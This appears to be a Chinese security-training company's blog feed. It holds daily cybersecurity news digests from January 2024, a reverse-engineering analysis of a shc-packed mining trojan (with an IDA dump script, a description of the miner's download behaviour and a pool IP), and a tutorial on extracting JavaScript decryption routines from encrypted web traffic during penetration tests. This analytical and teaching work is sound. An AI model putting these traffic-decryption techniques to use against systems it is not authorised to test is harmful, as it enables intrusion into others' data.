网络安全日报 2024年01月26日
1、HPE披露Midnight Blizzard组织入侵其安全团队邮件帐户
https://www.sec.gov/Archives/edgar/data/1645590/000164559024000009/hpe-20240119.htm 惠普企业 (HPE) 今天披露,疑似俄罗斯黑客 Midnight Blizzard 获得了该公司 Microsoft Office 365 电子邮件环境的访问权限,以窃取其网络安全团队和其他部门的数据。Midnight Blizzard,又名 Cozy Bear、APT29 和 Nobelium,是俄罗斯国家资助的黑客组织,据信隶属于俄罗斯对外情报局 (SVR)。威胁行为者全年与多次攻击有关,包括臭名昭著的 2020 Sola
2、研究人员披露VexTrio黑产组织为网络犯罪者代理流量
https://blogs.infoblox.com/cyber-threat-intelligence/cybercrime-central-vextrio-operates-massive-criminal-affiliate-program/ 研究人员新调查结果显示,ClearFake、SocGholish 和其他数十个攻击者背后的威胁行为者已与另一个名为 VexTrio 的实体建立了合作伙伴关系,作为大规模“犯罪附属计划”的一部分。该公司表示,最新的进展表明了“他们在网络犯罪行业中活动的广度和联系的深度”,并将VexTrio 描述为“安全文献中描述的最大的单一恶意流量代理”。据信,V
3、恶意NPM软件包通过GitHub窃取数百个开发人员SSH密钥
https://www.reversinglabs.com/blog/gitgot-cybercriminals-using-github-to-store-stolen-data 在 npm 包注册表中发现的两个恶意包利用 GitHub 来存储从安装它们的开发人员系统中窃取的 Base64 加密的 SSH 密钥。名为warbeast2000和kodiak2k 的模块于本月初发布,分别吸引了412 次和1281 次下载,随后被 npm 维护者删除。最近一次下载发生于 2024 年 1 月 21 日。warbeast2000 有 8 个不同版本,kodiak2k 有 30 多个版本。这两个模块
4、Kasseika勒索软件使用BYOVD手段对抗安全防护软件
https://www.trendmicro.com/en_us/research/24/a/kasseika-ransomware-deploys-byovd-attacks-abuses-psexec-and-expl.html Kasseika的勒索软件组织加入了Akira、AvosLocker、BlackByte 和 RobbinHood等其他组织的行列,成为最新一个利用自带漏洞驱动程序 ( BYOVD ) 攻击来解除受感染 Windows 主机上的安全相关进程的勒索软件组织。该策略允许“威胁行为者终止防病毒进程和服务以部署勒索软件” 。Kasseika于 2023 年 12 月中旬
5、谷歌Kubernetes错误配置可导致攻击者控制GKE集群
https://orca.security/resources/blog/sys-all-google-kubernetes-engine-risk-example/ 研究人员发现了一个影响 Google Kubernetes Engine (GKE) 的漏洞,拥有 Google 帐户的威胁参与者可能会利用该漏洞来控制 Kubernetes 集群。云安全公司 Orca将这一严重缺陷代号为Sys:All 。据估计,多达 250000 个活跃的 GKE 集群容易受到攻击。安全研究人员表示,这源于一种可能普遍存在的误解,即 Google Kubernetes Engine 中的系统:经过身份验证的
6、GoAnywhere软件存在安全漏洞攻击者可创建管理员账号
https://www.fortra.com/security/advisory/fi-2024-001 Fortra 的 GoAnywhere 托管文件传输 (MFT) 软件中披露了一个严重的安全漏洞,该漏洞可能被滥用来创建新的管理员用户。该问题的编号为CVE-2024-0204,CVSS 评分为 9.8(满分 10)。Fortra在 2024 年 1 月 22 日发布的公告中表示:“7.4.1 之前的 Fortra GoAnywhere MFT 中的身份验证绕过允许未经授权的用户通过管理门户创建管理员用户。”无法升级到版本 7.4.1 的用户可以通过删除安装目录中的 InitialAcc
7、2023年区块链黑客攻击导致价值17 亿美元加密货币被盗
https://www.securityweek.com/1-7-billion-stolen-in-cryptocurrency-hacks-in-2023-report/ 根据区块链分析公司 Chainaanalysis 的一份报告,2023 年,由于加密货币平台黑客攻击,总共价值 17 亿美元的加密货币被盗。
8、Mozilla 发布Firefox 122修复了15个漏洞
https://www.securityweek.com/firefox-122-patches-15-vulnerabilities/ Firefox 和 Thunderbird 发布的更新解决了 15 个漏洞,其中包括 5 个高严重性错误。
9、思科警告统一通信产品中存在严重漏洞请立即修补
https://securityaffairs.com/158116/security/cisco-unified-communications-critical-flaw.html 思科解决了其统一通信和联络中心解决方案产品中可能导致远程代码执行的严重缺陷。
10、严重的 Jenkins 漏洞使服务器易遭受 RCE 攻击
https://thehackernews.com/2024/01/critical-jenkins-vulnerability-exposes.html 开源持续集成/持续交付和部署 (CI/CD) 自动化软件 Jenkins 的维护者已经解决了九个安全漏洞,其中包括一个严重错误,如果成功利用该错误,可能会导致远程代码执行 (RCE)。该问题被分配了 CVE 标识符CVE-2024-23897,被描述为通过内置命令行界面 ( CLI )的任意文件读取漏洞。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
记一次挖矿木马样本分析
有一台vps被弱口令上马了
翻来翻去
找到个二进制文件如下
前言
搜main函数关键字可以判断是用shc加密shell脚本生成的二进制文件
在0000000000400F7E位置函数,找到了加载shell命令的位置
shc部分源码
/* shc.c */
/**
* This software contains an ad hoc version of the 'Alleged RC4' algorithm,
* which was anonymously posted on sci.crypt news by cypherpunks on Sep 1994.
*
* My implementation is a complete rewrite of the one found in
* an unknown-copyright (283 characters) version picked up from:
* From: allen@gateway.grumman.com (John L. Allen)
* Newsgroups: comp.lang.c
* Subject: Shrink this C code for fame and fun
* Date: 21 May 1996 10:49:37 -0400
* And it is licensed also under GPL.
*
*That's where I got it, now I am going to do some work on it
*It will reside here: http://github.com/neurobin/shc
*/
static const char my_name[] = "shc";
static const char version[] = "Version 4.0.3";
static const char subject[] = "Generic Shell Script Compiler";
static const char cpright[] = "GNU GPL Version 3";
static const struct { const char * f, * s, * e; }
provider = { "Md Jahidul", "Hamid", "<jahidulhamid@yahoo.com>" };
尝试生成一个echo “helloworld”,看看shc生成的文件是什么构造
shc
安装shc
sudo add-apt-repository ppa:neurobin/ppa
sudo apt-get update
sudo apt-get install shc
加密后会得到一份生成的c源码和可执行文件
[04:08:08] ctfshow@ubuntu /home/ctfshow/Desktop/test (0)
> shc -f ./test.sh
[04:08:11] ctfshow@ubuntu /home/ctfshow/Desktop/test (0)
> ls
test.sh test.sh.x* test.sh.x.c
[04:08:12] ctfshow@ubuntu /home/ctfshow/Desktop/test (0)
> ./test.sh.x
hello
会输出一个test.sh.c和编译好的test.sh.x
那么可以照着test.sh.c的源码来快速分析手上的二进制文件
调试发现ret会记录当前进程是否为父进程,
调试发现如果为父进程,则执行的命令是
exec bash ./<程序自己>
那么相当于把代码在子进程里面又跑了一遍
这个时候ret就是1了,加载的也会是text里面真正的代码段
思路
程序把shell命令用rc4加密在了硬编码里面,回到样本,只要更改ret的值然后调到execvp 然后print mem就能得到shell脚本了
patch && dump mem
修改ret值
在memcpy下断
祖传字符串脚本
base =0x000000000602B83
end = 0x00000000006074F0
ans=[]
for i in range(base,end):
tmp = idc.get_wide_byte(i)
ans.append(tmp)
if(tmp == 0):
print(bytes(ans))
ans=[]
shlll = b''
with open("sh.tmp", "w") as f:
print(shlll.decode(),file=f)
暂且写个脚本存一下
shell分析
到这一步就比较明了了
shell脚本里面存的命令全是用明文显示的
首先是删除日志和竞品矿机,然后设置iptable
释放iptable_reject
然后从远程服务器下载矿机
其中一个ip是172.104.170.240
上网搜一下ip是一个矿池
搜索矿池ip发现样本行为和安天于今年5月发布的yayayaminer有一定相似之处,在初期的排查阶段借鉴了其思路。
网络安全日报 2024年01月25日
1、加密货币窃密木马利用DNS记录中隐藏的恶意脚本传递载荷
https://securelist.com/new-macos-backdoor-crypto-stealer/111778/ 黑客正在使用一种隐秘的方法,通过隐藏恶意脚本的 DNS 记录向 macOS 用户传递信息窃取恶意软件。该活动似乎针对 macOS Ventura 及更高版本的用户,并依赖于重新打包为包含木马的 PKG 文件的破解应用程序。研究人员发现了该活动并分析了感染链的各个阶段。受害者按照安装说明将其放入 /Applications/ 文件夹后下载并执行恶意软件,假设它是他们下载的破解应用程序的激活器。这将打开一个伪造的激活器窗口,要求输入管理员密码。获得许可后,恶意软件会通
2、攻击者利用Atlassian Confluence产品RCE漏洞发起攻击
https://www.bleepingcomputer.com/news/security/hackers-start-exploiting-critical-atlassian-confluence-rce-flaw/ 安全研究人员正在观察 CVE-2023-22527 远程代码执行缺陷漏洞的利用尝试,该漏洞影响过时版本的 Atlassian Confluence 服务器。Atlassian上周披露了该安全问题 ,并指出该问题仅影响 2023 年 12 月 5 日之前发布的 Confluence 版本,以及一些不受支持的版本。该缺陷的严重性评分很高,被描述为模板注入漏洞,允许未经身份验证
3、抵押贷款机构LoanDepot遭网络攻击致1660万用户数据泄露
https://www.businesswire.com/news/home/20240122969848/en/loanDepot-Provides-Update-on-Cyber-Incident 抵押贷款机构 LoanDepot 表示,在本月早些时候披露的勒索软件攻击中,约 1660 万人的个人信息被盗。1 月 6 日的一次攻击迫使其关闭部分系统以遏制违规行为,该公司告诉客户,定期自动付款仍将得到处理,但付款历史记录会出现延迟。事件发生后,通过服务客户门户进行的付款也无法使用,其他几个在线门户,包括 MyloanDepot、HELOC 和 mellohome 网站也处于离线状态。几天后
4、Google发布Chrome 121 修复了17 个漏洞
https://www.securityweek.com/chrome-121-patches-17-vulnerabilities/ 谷歌周二宣布将 Chrome 121 升级至稳定版,修补了 17 个漏洞,其中 11 个是外部研究人员报告的。
5、5379 台公网GitLab 服务器易受零点击帐户接管攻击
https://securityaffairs.com/158075/hacking/gitlab-servers-vulnerable-cve-2023-7028.html 数千台 GitLab 服务器容易受到利用漏洞 CVE-2023-7028 的零点击帐户接管攻击。
6、全球零售商 BuyGoods.com 泄露用户 PII、KYC 数据
https://www.hackread.com/online-retailer-buygoods-com-pii-kyc-data-leak/ 暴露的服务器还暴露了客户和附属公司的个人记录,其中包含高度敏感的个人身份信息(PII)和了解你的客户(KYC)数据。
7、美国、英国和澳大利亚联合制裁 REvil 黑客组织成员
https://www.freebuf.com/news/390471.html Bleeping Computer 网站消息,澳大利亚、美国和英国政府宣布对俄罗斯人 Aleksandr Gennadievich Ermakov 实施制裁。据悉,该男子被认为是 2022 年 Medibank 攻击事件的幕后黑手,也是 REvil 勒索软件组织的重要成员。
8、苹果、VMware、Apache等科技巨头漏洞被大量应用
https://www.freebuf.com/news/390485.html Therecord网站披露,黑客因频繁利用多个新发现的漏洞发起攻击吸引了美国网络安全专家们的高度关注,专家们担心这些漏洞可能会被网络犯罪组织和其他各国政府用于不法目的。过去一周,美国网络安全专家和网络安全与基础设施安全局(CISA)等政府机构已经关注到了影响苹果、VMware、Atlassian、Fortra、Apache等科技巨头的漏洞。
9、微软内网遭撞库攻击:高管邮件被盗,法务/安全部门也被访问
https://www.secrss.com/articles/63068 微软表示,这次攻击系由俄罗斯支持的黑客组织“午夜暴雪”(Midnight Blizzard)发起。这是多年以来至少第二次,微软因不遵守基本网络卫生而导致可能伤害客户的漏洞。
10、Apple修复了2024年首个被利用的零日漏洞
https://www.bleepingcomputer.com/news/apple/apple-fixes-first-zero-day-bug-exploited-in-attacks-this-year/ 修复的零日漏洞被记录为CVE-2024-23222 [iOS, macOS, tvOS],它是一个WebKit混淆问题,攻击者可以利用它在目标设备上执行代码。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
行业认可 | 蚁景科技入选《2023中国网络安全行业全景册(第六版)》
2024年1月24日, FreeBuf咨询正式发布《CCSIP(China Cyber Security Industry Panorama)2023中国网络安全行业全景册(第六版)》。分为七大逻辑层、20个一级分类、108个二级分类。
FreeBuf咨询常年对网络安全技术、行业动态保持追踪,洞悉安全行业现状和趋势。由FreeBuf专业的评审团队,对安全厂商进行归类与评审。
在此次全景册中,蚁景科技作为可靠的网络安全人才培养服务提供商,最终入选安全靶场,攻防演练、安全咨询与培训教育三个细分板块。
本次入选《CCSIP(China Cyber Security Industry Panorama)2023中国网络安全行业全景册(第六版)》,是网安行业权威研究机构对蚁景科技企业实力和品牌影响力的高度认可。
未来,蚁景科技将继续坚持优化人才培养、技术创新和产业发展的良性生态,致力于培养更多的网络安全专业优秀人才,推动网安技术教学的创新和应用,为网安人才实战能力的全面提升贡献力量。
关于蚁景科技
湖南蚁景科技有限公司作为国内领先的“网络安全人才培养服务提供商”,为配合国家网络安全人才培养战略,以市场需求为导向,以能力提升为目标,从高校科研、教学实训及企事业单位实际需求出发,基于对“互联网+教育”的深刻理解,通过自主研发的“网络安全人才实训靶场”,为高校、政企单位、科研院所等行业客户提供满足在线实验教学的虚拟实验环境与各种课件资源,同时为广大网安爱好者提供技能培训、人才推荐等服务。实现网安人才技能学习积累、综合技能运用以及考核评估三大目标。
网络安全日报 2024年01月24日
1、ScarCruft组织针对安全研究人员发起网络钓鱼攻击
https://www.sentinelone.com/labs/a-glimpse-into-future-scarcruft-campaigns-attackers-gather-strategic-intelligence-and-target-cybersecurity-professionals/ 2023 年 12 月,名为ScarCruft的威胁行为者精心策划了一场新活动,媒体组织和朝鲜事务领域的知名专家成为了这场活动的目标。ScarCruft 一直在试验新的感染链,包括使用技术威胁研究报告作为诱饵,目标可能是网络安全专业人员等威胁情报的消费者。这个与朝鲜有联系的对手,也被称为
2、苹果发布针对iPhone和Mac产品中严重零日漏洞的补丁
https://cwe.mitre.org/data/definitions/843.html Apple 周一发布了 iOS、iPadOS、macOS、tvOS 和 Safari 网络浏览器的安全更新,以解决已被广泛利用的零日漏洞。该问题被追踪为CVE-2024-23222,是一个类型混淆错误,威胁行为者可以利用该错误在处理恶意制作的 Web 内容时实现任意代码执行。这家科技巨头表示,该问题已通过改进检查得到解决。一般来说,类型混淆漏洞可以被用来执行越界内存访问,或导致崩溃和任意代码执行。苹果在一份简短的咨询中承认,它“意识到有报告称这个问题可能已被利用”,但没有透露有关攻击性质或利用该缺
3、阿根廷Payoneer金融账户遭遇双因素身份验证绕过攻击
https://www.bleepingcomputer.com/news/security/payoneer-accounts-in-argentina-hacked-in-2fa-bypass-attacks/ 阿根廷的许多 Payoneer 用户表示,在睡觉时收到短信 OTP 代码后,醒来后发现他们受 2FA 保护的账户遭到黑客攻击,资金被盗。Payoneer是一家提供在线汇款和数字支付服务的金融服务平台。它在阿根廷很受欢迎,因为它允许人们在绕过当地银行法规的同时赚取外币收入。从上周末开始,许多账户受到双因素身份验证 (2FA) 保护的阿根廷 Payoneer 用户 报告说, 他们的账
4、MavenGate攻击劫持Java和安卓应用中依赖的废弃库
https://blog.oversecured.com/Introducing-MavenGate-a-supply-chain-attack-method-for-Java-and-Android-applications/ 一些被放弃但仍在 Java 和 Android 应用程序中使用的公共和流行库被发现容易受到名为 MavenGate 的新软件供应链攻击方法的影响。对项目的访问可以通过域名购买被劫持,并且由于大多数默认构建配置都很容易受到攻击,因此很难甚至不可能知道是否正在执行攻击。成功利用这些缺陷可能会允许恶意行为者劫持依赖项中的工件并将恶意代码注入应用程序,更糟糕的是,甚至通过恶
5、NS-STEALER利用Discord机器人从主流浏览器中窃取数据
https://www.trellix.com/about/newsroom/stories/research/java-based-sophisticated-stealer-using-discord-bot-as-eventlistener/ 网络安全研究人员发现了一种新的基于 Java 的“复杂”信息窃取程序,它使用 Discord 机器人从受感染的主机中窃取敏感数据。这种名为NS-STEALER的恶意软件通过伪装成破解软件的 ZIP 档案进行传播。ZIP 文件中包含一个恶意 Windows 快捷方式文件(“Loader GAYve”),该文件充当部署恶意 JAR 文件的管道,该文件
6、Splunk Enterprise 中的高严重性漏洞已修复
https://www.securityweek.com/high-severity-vulnerability-patched-in-splunk-enterprise/ 最新的 Splunk Enterprise 版本修复了多个漏洞,其中包括 Windows 版本中的一个高严重性缺陷。
7、航空租赁巨头 AerCap 遭受勒索软件攻击
https://www.securityweek.com/aircraft-lessor-aercap-confirms-ransomware-attack/ 全球最大的航空租赁公司 AerCap 于 1 月 17 日遭受勒索软件攻击。
8、美国SEC 称 X 账户通过 SIM 卡交换遭到黑客攻击
https://www.securityweek.com/sec-says-x-account-hacked-via-sim-swapping/ 美国证券交易委员会周一透露,黑客利用 SIM 卡交换的方式接管了其 X(前身为 Twitter)账户。
9、一个新的严重漏洞会影响FORTRA GOANYWHERE MFT
https://securityaffairs.com/157993/hacking/fortra-goanywhere-mft-critical-flaw.html Fortra 解决了影响 GoAnywhere MFT(托管文件传输)产品的新身份验证绕过漏洞。Fortra 警告客户存在一个名为 CVE-2024-0204 (CVSS 评分 9.8)的新身份验证绕过漏洞,该漏洞会影响 GoAnywhere MFT(托管文件传输)产品。
10、研究称手机环境光传感器可泄露用户隐私信息
https://www.freebuf.com/news/390377.html 麻省理工学院计算机科学和人工智能实验室(CSAIL)的一项研究论文显示,Android 和 iPhone 手机的环境光传感器可以变成摄像头,让攻击者可以探测用户行为及其周围环境。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
实战:加密传输数据解密
前言
下面将分享一些实际的渗透测试经验,帮助你应对在测试中遇到的数据包内容加密的情况。我们将以实战为主,技巧为辅,进入逆向的大门。
技巧
开局先讲一下技巧,掌握好了技巧,方便逆向的时候可以更加快速的找到关键函数位置!
后续也会有更多的实战会按照技巧去操作。
关键词搜索一:在js代码没有混淆的情况下。我们可以直接进行关键词搜索,加密可以搜索encrypt,解密可以搜索decrypt。至于原因就是,无论是加密数据解密,还是明文数据进行加密,都必然会经过加密算法。
关键词搜索二:如果第一种方法搜索不到需要的信息,可以尝试搜索 JSON.parse() 方法。加密数据通常是字符串格式的,解密后也是字符串格式的。在前端中,需要使用 JSON 格式而不是字符串格式的数据,因此必须进行反序列化(即将字符串转换为 JavaScript 对象)处理。
关键词搜索三:api后端返回的是json键值对格式的,我们也可以去尝试搜索加密字符值的键去找到关键的加密位置。
正文
实战一:
在进入网址后,查看XHR请求时发现数据被加密了。尽管XHR中的数据是经过加密的,但在页面上却以明文形式呈现。因此可以初步判断,在前端渲染页面时,会对从后端传输下来的数据进行解密操作。
搜索JSON.parse时,找到了11个参数。在每一个包含JSON.parse的代码行下设置断点,然后刷新页面,断点被断在了18647行。
控制台中打印JSON.parse(v),你会发现明文数据就是v。所以这段代码是用来解密的函数。
y是解密后的参数,y是由v解析出来的,v的传参是d,d的传参是l,下断点发现l是加密字符串。Object(c.a)(l)表示对变量c.a执行函数调用,并将参数l传递给该函数。
将这段代码扣下来并且运行,报错没有没有找到Object(c.a)。
在控制台打印Object(c.a),直接进去函数内部扣代码
改写一下代码,l是传进去的加密字符串。
运行之后t报错,发现_keyStr未定义
全局搜索_keyStr发现是一个字符串,直接复制下来。
运行报错Object(c.b)未定义
将鼠标浮上Object(c.b)可以发现他是一个名字为d2的函数,进去js里面将d2函数抠出来并且替换掉函数名
改写函数名
运行报错_p未定义
全局搜索p发现这个变量很乏有太多重复的,不过初步判断是一个变量,我们可以在p后面加一个空格搜索。_p加空格只有7个,很快便找到了这个变量,发现他是一个字符串。将他扣进代码里面。
运行报错,_u_d函数未定义。
全局搜索_u_d,将其扣进代码里面
运行一下。
数据已经成功解密了。
实战二:
抓个包,数据包内容已经被加密了
从initiator进入到js文件里面
搜索解密关键词,发现第66752有个decrypt,把断点下在return那一行。
在66752下断点刷新,将返回的那段代码在控制台打印。发现是解密之后的数据,那么这一段函数肯定是解密函数
扣代码运行报错url2和text2未定义
去浏览器下断点补上两个未定义的参数,url2是一个固定的值
而text2是加密字符串。
运行之后报错cryptoJs未定义
将cryptoJs.exports在控制台上面打印出来,发现是加密库crypto,直接调库替换即可
运行报错,node.js里面的解码函数是btoa,将encode替换成btoa即可。
解密成功
结尾
部分数据代码已做脱敏处理。
网络安全日报 2024年01月23日
1、COLDRIVER组织利用Rust语言恶意软件扩大钓鱼攻击范围
https://blog.google/threat-analysis-group/google-tag-coldriver-russian-phishing-malware/ 与俄罗斯有关的威胁行为者COLDRIVER不断发展其间谍技术,超越了凭据收集的范围,以提供有史以来第一个用 Rust 编程语言编写的定制恶意软件。研究人员表示攻击链利用 PDF 作为诱饵文档来触发感染序列。诱饵是从模拟帐户发送的。COLDRIVER,也称为 Blue Callisto、BlueCharlie(或 TAG-53)、Calisto(也可拼写为 Callisto)、Dancing Salome、Gossam
2、Midnight Blizzard组织针对微软高管的电子邮件发起网络攻击
https://msrc.microsoft.com/blog/2024/01/microsoft-actions-following-attack-by-nation-state-actor-midnight-blizzard/ 微软周五透露,它是对其企业系统进行民族国家攻击的目标,导致该公司网络安全和法律部门的高级管理人员和其他人员的电子邮件和附件被盗。这家 Windows 制造商将此次攻击归因于其追踪的俄罗斯高级持续威胁 (APT) 组织Midnight Blizzard(以前称为 Nobelium),该组织也称为 APT29、BlueBravo、Cloaked Ursa、Cozy B
3、研究人员披露部署复杂远程访问木马的恶意npm软件包
https://blog.phylum.io/npm-package-found-delivering-sophisticated-rat/ 已发现上传到 npm 注册表的恶意包在受感染的 Windows 计算机上部署复杂的远程访问木马。该软件包名为“ os兼容”,于 2024 年 1 月 9 日发布,在被删除之前总共吸引了380 次下载。如果平台不是 Windows,它会向用户显示一条错误消息,指出脚本正在 Linux 或无法识别的操作系统上运行,敦促他们在“Windows Server OS”上运行它。批处理脚本本身会验证它是否具有管理员权限,如果没有,则通过 PowerShell 命令
4、Tietoevry勒索软件攻击导致瑞典企业和城市停电
https://www.tietoevry.com/en/newsroom/all-news-and-releases/other-news/2024/01/ransomware-attack-in-sweden-update/ 芬兰 IT 服务和企业云托管提供商 Tietoevry 遭受勒索软件攻击,影响其位于瑞典的一个数据中心的云托管客户,据报道,此次攻击是由 Akira 勒索软件团伙发起的。Tietoevry 是一家芬兰 IT 服务公司,为企业提供托管服务和云托管。该公司在全球拥有约 24000 名员工,2023 年收入为 31 亿美元。Tietoevry 今天证实,勒索软件攻击发生在
5、3AM勒索软件与Conti组织和Royal勒索软件有关联性
https://www.bleepingcomputer.com/news/security/researchers-link-3am-ransomware-to-conti-royal-cybercrime-gangs/ 安全研究人员分析了最近出现的 3AM 勒索软件操作的活动,发现其与 Conti 集团和 Royal 勒索软件团伙等组织有密切联系。3AM(也拼写为 ThreeAM)也一直在尝试一种新的勒索策略:与受害者的社交媒体关注者分享数据泄露的消息,并使用机器人回复 X(以前称为 Twitter)上的高级帐户,发送指向数据泄露的消息。研究人员注意到威胁参与者在部署 LockBit 恶
6、Apple 发布 iOS 和 macOS更新修复WebKit零日漏洞
https://www.securityweek.com/apple-ships-ios-17-3-warns-of-webkit-zero-day-exploitation/ Apple 推出了新版本的 iOS 和 macOS 平台,以修复被零日漏洞利用的 WebKit 漏洞。
7、开源 AI/ML 平台中发现多个严重漏洞
https://www.securityweek.com/critical-vulnerabilities-found-in-ai-ml-open-source-platforms/ 安全研究人员标记了开源 AI/ML 解决方案 MLflow、ClearML、Hugging Face 中的多个严重漏洞。
8、研究人员发现超大规模数据泄露,共260亿条
https://securityaffairs.com/157933/breaking-news/largest-data-leak-ever.html 这次超大规模泄露包含来自之前多次泄露的数据,其中包含令人震惊的 12 TB 信息,涵盖令人难以置信的 260 亿条记录。几乎可以肯定,这次泄漏是迄今为止发现的最大的一次泄漏。
9、网络犯罪分子在暗网中泄露了从泰国窃取的大量 PII 数据
https://securityaffairs.com/157870/data-breach/resecurity-massive-thailand-data-leak.html 安全研究人员警告说,网络犯罪分子在暗网上大量泄露了被盗的泰国个人身份信息 (PII)。
10、乌克兰最大的移动银行 Monobank 遭遇大型DDoS 攻击
https://thecyberexpress.com/monobank-cyberattack/ 乌克兰最大的移动银行 Monobank 遭受了一系列拒绝服务 (DDoS) 攻击,首席执行官确认在一次攻击中产生了惊人的 5.8 亿个服务请求。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2024年01月22日
1、黑产团伙利用国内下载站传播Mac远控木马
https://mp.weixin.qq.com/s/EhRX26TP9rxEKys_MzDYvQ 近期安天CERT发现一组利用非官方软件下载站进行投毒和攻击下游用户案例,攻击者在网管运维工具上捆绑植入macOS平台远控木马,利用国内非官方下载站发布,以此取得政企机构内部关键主机桥头堡。安天CERT判断该事件针对的目标为国内IT运维人员,当运维人员寻找macOS平台下免费或破解的运维工具时可能会搜索到该下载站,并下载执行含有恶意文件的运维工具,进一步连接攻击者服务器运行远控木马窃取主机中的数据和文件。该团伙使用经过精心构造的域名,并对下载的载荷文件进行混淆处理,以规避安全产品的检测,安天CE
2、CISA和FBI警告Androxgh0st僵尸网络的凭证窃取活动
https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-016a CISA 和 FBI 今天警告称,使用 Androxgh0st 恶意软件的威胁行为者正在构建一个专注于云凭证盗窃的僵尸网络,并利用窃取的信息来传播额外的恶意负载。该僵尸网络于 2022 年首次被发现,大约一年前控制了 40000 多台设备。它扫描易受以下远程代码执行 (RCE) 漏洞影响的网站和服务器: CVE-2017-9841(PHPUnit 单元测试框架)、CVE-2021-41773(Apache HTTP Server)和CVE-2018-1513
3、攻击者利用Docker漏洞部署挖矿程序与灰产软件盈利
https://www.cadosecurity.com/containerised-clicks-malicious-use-of-9hits-on-vulnerable-docker-hosts/ 易受攻击的 Docker 服务正成为一项新颖活动的目标,在该活动中,威胁行为者正在部署 XMRig 加密货币挖矿程序以及 9Hits Viewer 软件,作为多管齐下的货币化策略的一部分。这是第一个记录在案的恶意软件将 9Hits 应用程序作为有效负载部署的案例。9Hits将自己宣传为“独特的网络流量解决方案”和“自动流量交换”,允许服务成员将流量引入其网站以换取购买积分。这是通过名为 9Hi
4、TA866组织针对北美目标发送数千封发票主题的钓鱼邮件
https://www.proofpoint.com/us/blog/threat-insight/security-brief-ta866-returns-large-email-campaign 研究人员发现 TA866 在消失九个月后又重新出现在电子邮件威胁活动数据中。2024 年 1 月 11 日,研究人员阻止了一场大规模活动,其中包括针对北美的数千封电子邮件。以发票为主题的电子邮件附有 PDF,其名称例如“Document_[10 位数字].pdf”以及各种主题,例如“项目成就”。PDF 包含 OneDrive URL,如果单击这些 URL,则会启动多步骤感染链,最终导致恶意软件负
5、研究人员发布EDK II网络启动环境存在的9个安全漏洞
https://blog.quarkslab.com/pixiefail-nine-vulnerabilities-in-tianocores-edk-ii-ipv6-network-stack.html 一组九个漏洞(统称为“PixieFail”)影响 Tianocore EDK II 的 IPv6 网络协议栈,EDK II 是广泛用于企业计算机和服务器的 UEFI 规范的开源参考实现。这些缺陷存在于 PXE 网络启动过程中,该过程对于在数据中心和高性能计算环境中配置操作系统以及启动时从网络加载操作系统映像的标准过程至关重要。研究人员发现PixieFail 缺陷,并已通过 CERT/CC
6、CISA警告Ivanti EPMM身份验证绕过漏洞正在被积极利用
https://www.cisa.gov/news-events/alerts/2024/01/18/cisa-adds-one-known-exploited-vulnerability-catalog 美国网络安全和基础设施安全局 (CISA) 周四将一个现已修补的影响 Ivanti Endpoint Manager Mobile (EPMM) 和 MobileIron Core 的严重缺陷添加到其已知被利用的漏洞 ( KEV )目录中,并表示该漏洞正在被积极利用。所涉及的漏洞是CVE-2023-35082(CVSS 评分:9.8),这是一种身份验证绕过方法,它是针对 CVE-2023-
7、攻击者滥用TeamViewer软件部署勒索攻击软件
https://www.huntress.com/blog/ransomware-deployment-attempts-via-teamviewer 勒索软件攻击者再次使用 TeamViewer 获得对组织端点的初始访问权限,并尝试基于泄露的 LockBit 勒索软件构建器部署加密器。TeamViewer 是一种在企业界广泛使用的合法远程访问工具,因其简单性和功能而受到重视。不幸的是,该工具也受到诈骗者甚至勒索软件攻击者的使用,他们使用它来访问远程桌面,不受阻碍地删除和执行恶意文件。研究人员的一份新报告显示,网络犯罪分子并没有放弃这些旧技术,仍然通过 TeamViewer 接管设备来尝试部
8、TensorFlow机器学习框架存在安全漏洞可能导致供应链攻击
https://www.praetorian.com/blog/tensorflow-supply-chain-compromise-via-self-hosted-runner-attack/ 在开源TensorFlow机器学习框架中发现的持续集成和持续交付 (CI/CD) 错误配置可能会被用来策划供应链攻击。攻击者可能会滥用这些错误配置,“通过恶意拉取请求破坏 TensorFlow 的构建代理,从而对 GitHub 和 PyPi 上的 TensorFlow 版本进行供应链破坏” 。成功利用这些问题可能会允许外部攻击者将恶意版本上传到 GitHub 存储库,在自托管 GitHub 运行器上
9、谷歌发布安全更新以修复Chrome浏览器中四个安全漏洞
https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_16.html 谷歌发布了更新,修复了 Chrome 浏览器中的四个安全问题,其中包括一个被积极利用的零日漏洞。该问题编号为CVE-2024-0519,涉及 V8 JavaScript 和 WebAssembly 引擎中的越界内存访问,威胁行为者可利用该问题触发崩溃。通过读取越界内存,攻击者可能能够获取秘密值,例如内存地址,这可以绕过 ASLR 等保护机制,以提高利用单独的弱点来实现代码的可靠性和可能性执行,而不仅仅是拒绝服务。有关攻
10、Atlassian Jira产品平台持续中断影响多个云服务
https://jira-software.status.atlassian.com/incidents/z9kvvpkbngws 1 月 18 日,多个 Atlassian Jira 产品正在经历持续中断。Jira Work Management、Jira Software、Jira Service Management 和 Jira Product Discovery 的用户面临连接问题。东部时间 18 日上午 5:52:Atlassian 已实施修复,应该可以解决该问题并继续监控该事件。 Jira 服务从 18 日早上开始(至少截至东部时间凌晨 3:34)遇到连接问题。该事件影响了多个
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2024年01月19日
1、研究人员披露可逃避macOS内置安全软件的XProtect木马
